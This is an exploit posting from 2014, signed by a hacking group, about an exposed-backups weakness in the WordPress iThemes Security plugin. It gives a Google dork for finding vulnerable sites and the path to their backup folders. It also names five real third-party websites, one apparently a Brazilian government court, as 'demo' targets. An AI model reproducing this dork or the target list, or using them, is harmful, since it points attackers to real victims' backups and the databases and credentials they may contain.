facebook facebook twitter rss

WordPress ithemes-security Arbitrary File Download Vulnerability .

Author: Pro_Mast3r , Published: 05-10-2014
-------------------------------------
# Exploit Title: WordPress ithemes-security Arbitrary File Download Vulnerability .


# Google Dork: inurl:/wp-content/uploads/ithemes-security/backups/ .


# Date: 10-05-2014 .


# Author: Pro Mast3r .


# Author E-mail : Pro.Mast3r@hotmail.com


# Category: webapps


# platform: php


# Vendor: http://ithemes.com/ - https://wordpress.org/plugins/better-wp-security/


# p0c :

in local Post Backup

http://[site]/wp-content/uploads/ithemes-security/backups/

# demo :

https://www.tce.am.gov.br/ecp/wp-content/uploads/ithemes-security/backups/
http://www.missiondawah.com/dawah/wp-content/uploads/ithemes-security/backups/
http://www.kerpen-bears.de/wp-content/uploads/ithemes-security/
http://www.newhope4all.org/wp-content/uploads/ithemes-security/backups/
http://www.gaylordslids.com/wp-content/uploads/ithemes-security/backups/
-----
#exploit4arab
#IRAQ Cyber Army

Like us on Facebook :